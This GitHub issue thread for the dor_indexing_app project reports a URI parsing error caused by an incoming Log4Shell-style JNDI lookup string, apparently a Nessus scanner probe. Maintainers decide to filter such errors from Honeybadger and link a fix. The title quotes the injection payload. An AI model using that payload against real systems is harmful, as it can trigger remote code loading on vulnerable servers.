### ISSUE TITLE
[dor_indexing_app/qa] URI::InvalidComponentError: bad component(expected host component): ${jndi:ldap://10.111.6.251:54198/nessus}

### ISSUE THREAD

**Issue by drh-stanford** [sul-dlss/dor_indexing_app#739]
## Backtrace

[View full backtrace and more info at honeybadger.io](https://app.honeybadger.io/projects/49898/faults/83420016)

**Comment by justinlittman** [comment]
Action for this ticket: Filter these from Honeybadger.

**Comment by jcoyne** [comment]
Fixed by https://github.com/sul-dlss/shared_configs/pull/1744
